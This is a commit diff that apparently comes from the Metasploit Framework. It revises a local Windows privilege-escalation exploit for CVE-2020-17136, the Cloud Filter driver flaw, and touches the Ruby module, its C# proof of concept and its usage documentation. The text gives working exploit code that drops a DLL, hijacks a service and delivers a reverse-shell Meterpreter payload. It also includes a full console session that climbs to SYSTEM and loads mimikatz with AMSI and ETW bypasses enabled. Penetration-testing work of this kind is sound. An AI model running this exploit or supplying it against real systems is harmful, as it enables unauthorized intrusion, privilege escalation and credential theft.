Make second round of review edits to fix Spencer's comments

2024-10-09 04:26:11 +02:00 · 2021-01-08 12:50:52 -06:00 · 2021-01-08 12:50:52 -06:00 · 3072391d00
commit 3072391d00
parent d5bb36c530
4 changed files with 85 additions and 79 deletions
--- a/data/exploits/CVE-2020-17136/cloudFilterEOP.exe
+++ b/data/exploits/CVE-2020-17136/cloudFilterEOP.exe
--- a/documentation/modules/exploit/windows/local/cve_2020_17136.md
+++ b/documentation/modules/exploit/windows/local/cve_2020_17136.md
@ -7,21 +7,23 @@ security checks that would otherwise prevent a normal user from being able to cr
 they don't have permissions to create files in.
 This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
-Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module
+Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. Users are
-then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process,
+strongly encouraged to set the `PAYLOAD` option to one of the Meterpreter payloads, as doing so will
-thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user.
+allow them to subsequently escalate their new session from `NETWORK SERVICE` to `SYSTEM` by using
 Meterpreter's `getsystem` command to perform RPCSS Named Pipe Impersonation and impersonate
 the `SYSTEM` user.
 ### Installation And Setup
 `cldflt.sys` should exist by default on all versions of Windows 10 v1803 and later.
 ## Verification Steps
  1. Start msfconsole
-  2. Get a meterpreter shell as a low privileged user.
+  2. Get a shell as a low privileged user.
  3. **Verify** that `getsystem` does not get you a `SYSTEM` shell.
  4. `use exploit/windows/local/cve_2020_17136`
  5. `set session *session id*`
  6. `run`
-  7. **Verify** that you get a new shell as the `SYSTEM` user
+  7. **Verify** that you get a new shell as the `N` user
 ## Options
@ -43,7 +45,7 @@ msf6 exploit(multi/handler) > run
 [*] Started bind TCP handler against 172.22.152.177:4444
 [*] Sending stage (200262 bytes) to 172.22.152.177
-[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-06 01:26:51 -0600
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.22.152.177:4444) at 2021-01-08 11:17:11 -0600
 meterpreter > getuid
 Server username: DESKTOP-KUO5CML\normal
@ -60,14 +62,6 @@ SeShutdownPrivilege
 SeTimeZonePrivilege
 SeUndockPrivilege
 meterpreter > sysinfo
 Computer        : DESKTOP-KUO5CML
 OS              : Windows 10 (10.0 Build 19041).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 5
 Meterpreter     : x64/windows
 meterpreter > getsystem
 [-] 2001: Operation failed: Access is denied. The following was attempted:
 [-] Named Pipe Impersonation (In Memory/Admin)
@ -78,16 +72,20 @@ meterpreter > background
 [*] Backgrounding session 1...
 msf6 exploit(multi/handler) > use exploit/windows/local/cve_2020_17136
 [*] Using configured payload windows/x64/meterpreter/reverse_tcp
 msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
 SESSION => 1
 msf6 exploit(windows/local/cve_2020_17136) > check
 [*] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
 msf6 exploit(windows/local/cve_2020_17136) > show options
 Module options (exploit/windows/local/cve_2020_17136):
-   Name            Current Setting  Required  Description
+   Name        Current Setting  Required  Description
-   ----            ---------------  --------  -----------
+   ----        ---------------  --------  -----------
-   AMSIBYPASS      true             yes       Enable Amsi bypass
+   AMSIBYPASS  true             yes       Enable Amsi bypass
-   ETWBYPASS       true             yes       Enable Etw bypass
+   ETWBYPASS   true             yes       Enable Etw bypass
-   SESSION                          yes       The session to run this module on.
+   SESSION     1                yes       The session to run this module on.
-   WAIT            5                no        Time in seconds to wait
+   WAIT        5                no        Time in seconds to wait
 Payload options (windows/x64/meterpreter/reverse_tcp):
@ -106,36 +104,52 @@ Exploit target:
   0   Windows DLL Dropper
 msf6 exploit(windows/local/cve_2020_17136) > set SESSION 1
 SESSION => 1
 msf6 exploit(windows/local/cve_2020_17136) > set LHOST 172.22.159.28
 LHOST => 172.22.159.28
 msf6 exploit(windows/local/cve_2020_17136) > set LPORT 6688
 LPORT => 6688
 msf6 exploit(windows/local/cve_2020_17136) > run
-[*] Started reverse TCP handler on 172.22.159.28:6688
+[*] Started reverse TCP handler on 172.22.159.28:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. A vulnerable Windows 10 20H1 build was detected!
-[*] Dropping payload dll at C:\Windows\Temp\WsutUtXDcIsPqEKn.dll and registering it for cleanup...
+[*] Dropping payload dll at C:\Windows\Temp\BXNkequQiAvYxuVp.dll and registering it for cleanup...
 [*] Running module against DESKTOP-KUO5CML
 [*] Launching notepad.exe to host CLR...
-[+] Process 7784 launched.
+[+] Process 100 launched.
-[*] Reflectively injecting the Host DLL into 7784..
+[*] Reflectively injecting the Host DLL into 100..
-[*] Injecting Host into 7784...
+[*] Injecting Host into 100...
-[*] Host injected. Copy assembly into 7784...
+[*] Host injected. Copy assembly into 100...
 [*] Assembly copied.
 [*] Executing...
 [*] Start reading output
-[+] Key: 1821285265184
+[+] Sync connection key: 2733760425760
 [+] Done
 [*] End output.
 [+] Execution finished.
 [*] Sending stage (200262 bytes) to 172.22.152.177
-[*] Meterpreter session 2 opened (172.22.159.28:6688 -> 172.22.152.177:62867) at 2021-01-06 01:28:26 -0600
+[*] Meterpreter session 2 opened (172.22.159.28:4444 -> 172.22.152.177:49968) at 2021-01-08 11:18:19 -0600
 [*] Session ID 2 (172.22.159.28:6688 -> 172.22.152.177:62867) processing AutoRunScript 'post/windows/escalate/getsystem'
 [+] Obtained SYSTEM via technique 4
 meterpreter > getuid
 Server username: NT AUTHORITY\NETWORK SERVICE
 meterpreter > getprivs
 Enabled Process Privileges
 ==========================
 Name
 ----
 SeAssignPrimaryTokenPrivilege
 SeAuditPrivilege
 SeChangeNotifyPrivilege
 SeCreateGlobalPrivilege
 SeImpersonatePrivilege
 SeIncreaseQuotaPrivilege
 SeIncreaseWorkingSetPrivilege
 SeShutdownPrivilege
 SeTimeZonePrivilege
 SeUndockPrivilege
 meterpreter > getsystem
 ...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > getprivs
@ -157,7 +171,7 @@ SeTimeZonePrivilege
 SeUndockPrivilege
 meterpreter > load kiwi
-Loading extension kiwi...cre
+Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
@ -198,8 +212,8 @@ normal            DESKTOP-KUO5CML  (null)
 test              DESKTOP-KUO5CML  (null)
-meterpreter > background
+meterpreter >
-[*] Backgrounding session 2...
+Background session 2? [y/N]
 msf6 exploit(windows/local/cve_2020_17136) > sessions
 Active sessions
@ -208,7 +222,7 @@ Active sessions
  Id  Name  Type                     Information                               Connection
  --  ----  ----                     -----------                               ----------
  1         meterpreter x64/windows  DESKTOP-KUO5CML\normal @ DESKTOP-KUO5CML  0.0.0.0:0 -> 172.22.152.177:4444 (172.22.152.177)
-  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:6688 -> 172.22.152.177:62867 (172.22.152.177)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-KUO5CML     172.22.159.28:4444 -> 172.22.152.177:49968 (172.22.152.177)
 msf6 exploit(windows/local/cve_2020_17136) >
 ```
--- a/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
+++ b/external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
@ -590,7 +590,7 @@ namespace POC_CloudFilter_ArbitraryFile_EoP
                    CfConnectSyncRoot(SyncRoot, table, IntPtr.Zero, CF_CONNECT_FLAGS.CF_CONNECT_FLAG_NONE, out long key).Check();
                    try
                    {
-                        Console.WriteLine("Key: {0}", key);
+                        Console.WriteLine("Sync connection key: {0}", key);
                        CF_PLACEHOLDER_CREATE_INFO[] place_holders = new CF_PLACEHOLDER_CREATE_INFO[1];
                        place_holders[0].RelativeFileName = FilePath;
                        CF_FS_METADATA meta_data = new CF_FS_METADATA
--- a/modules/exploits/windows/local/cve_2020_17136.rb
+++ b/modules/exploits/windows/local/cve_2020_17136.rb
@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
  include Msf::Post::Windows::ReflectiveDLLInjection
  include Msf::Post::Windows::Dotnet
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::FileSystem
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck
@ -20,17 +21,20 @@ class MetasploitModule < Msf::Exploit::Local
        info,
        'Name' => 'CVE-2020-1170 Cloud Filter Arbitrary File Creation EOP',
        'Description' => %q{
-          The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December 2020 updates,
+          The Cloud Filter driver, cldflt.sys, on Windows 10 v1803 and later, prior to the December
-          did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when calling
+          2020 updates, did not set the IO_FORCE_ACCESS_CHECK or OBJ_FORCE_ACCESS_CHECK flags when
-          FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders() function with attacker
+          calling FltCreateFileEx() and FltCreateFileEx2() within its HsmpOpCreatePlaceholders()
-          controlled input. This meant that files were created with KernelMode permissions, thereby bypassing any
+          function with attacker controlled input. This meant that files were created with
-          security checks that would otherwise prevent a normal user from being able to create files in directories
+          KernelMode permissions, thereby bypassing any security checks that would otherwise
          prevent a normal user from being able to create files in directories
          they don't have permissions to create files in.
-          This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage
+          This module abuses this vulnerability to perform a DLL hijacking attack against the
-          Spaces SMP service, which grants the attacker code execution as the NETWORK SERVICE user. The module
+          Microsoft Storage Spaces SMP service, which grants the attacker code execution as the
-          then uses RPCSS named pipe impersonation to obtain a SYSTEM token and assign it to the current process,
+          NETWORK SERVICE user. Users are strongly encouraged to set the PAYLOAD option to one
-          thereby allowing the attacker to execute arbitrary code as the SYSTEM user.
+          of the Meterpreter payloads, as doing so will allow them to subsequently escalate their
          new session from NETWORK SERVICE to SYSTEM by using Meterpreter's "getsystem" command
          to perform RPCSS Named Pipe Impersonation and impersonate the SYSTEM user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
@ -40,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Privileged' => true,
-        'Arch' => [ARCH_X86, ARCH_X64],
+        'Arch' => [ARCH_X64],
        'Targets' =>
          [
            [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X64], 'Type' => :windows_dropper } ],
@ -62,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
          {
            'EXITFUNC' => 'process',
            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
            'AUTORUNSCRIPT' => 'post/windows/escalate/getsystem'
          }
      )
    )
@ -81,23 +84,6 @@ class MetasploitModule < Msf::Exploit::Local
    )
  end
  def find_required_clr(exe_path)
    filecontent = File.read(exe_path).bytes
    sign = 'v4.0.30319'.bytes
    filecontent.each_with_index do |_item, index|
      sign.each_with_index do |subitem, indexsub|
        break if subitem.to_s(16) != filecontent[index + indexsub].to_s(16)
        if indexsub == 9
          vprint_status('CLR version required: v4.0.30319')
          return 'v4.0.30319'
        end
      end
    end
    vprint_status('CLR version required: v2.0.50727')
    'v2.0.50727'
  end
  def check_requirements(clr_req, installed_dotnet_versions)
    installed_dotnet_versions.each do |fi|
      if clr_req == 'v4.0.30319'
@ -116,7 +102,6 @@ class MetasploitModule < Msf::Exploit::Local
  def check
    sysinfo_value = sysinfo['OS']
    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
@ -153,23 +138,29 @@ class MetasploitModule < Msf::Exploit::Local
  def exploit
    if sysinfo['Architecture'] != 'x64'
      fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!')
    elsif session.arch != 'x64'
      fail_with(Failure::NoTarget, 'Sorry, WoW64 is not supported at this time!')
    end
    dir_junct_path = 'C:\\Windows\\Temp'
    intermediate_dir = rand_text_alpha(10).to_s
    junction_dir = rand_text_alpha(10).to_s
    path_to_intermediate_dir = "#{dir_junct_path}\\#{intermediate_dir}"
-    cd(dir_junct_path)
+    mkdir("#{path_to_intermediate_dir}")
-    mkdir(intermediate_dir)
+    if !directory?("#{path_to_intermediate_dir}")
    if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
    end
-    register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}")
+    register_dir_for_cleanup("#{path_to_intermediate_dir}")
-    cmd_exec("cmd.exe /C \"mklink /J #{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir} C:\\\"")
+    mkdir("#{path_to_intermediate_dir}\\#{junction_dir}")
-    if !directory?("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
+    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
-      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory!')
+      fail_with(Failure::UnexpectedReply, 'Could not create the junction directory as a folder!')
    end
    mount_handle = create_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", 'C:\\')
    if !directory?("#{path_to_intermediate_dir}\\#{junction_dir}")
      fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
    end
    register_dir_for_cleanup("#{dir_junct_path}\\#{intermediate_dir}\\#{junction_dir}")
    exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
    unless File.file?(exe_path)
@ -180,17 +171,18 @@ class MetasploitModule < Msf::Exploit::Local
    if installed_dotnet_versions == []
      fail_with(Failure::BadConfig, 'Target has no .NET framework installed')
    end
-    rclr = find_required_clr(exe_path)
+    if check_requirements('v4.0.30319', installed_dotnet_versions) == false
    if check_requirements(rclr, installed_dotnet_versions) == false
      fail_with(Failure::BadConfig, 'CLR required for assembly not installed')
    end
    payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
    print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
    write_file(payload_path, generate_payload_dll)
    register_file_for_cleanup(payload_path)
-    execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
+    execute_assembly(exe_path, "#{path_to_intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
    service_start('smphost')
    register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
    sleep(3)
    delete_mount_point("#{path_to_intermediate_dir}\\#{junction_dir}", mount_handle)
  end
  def pid_exists(pid)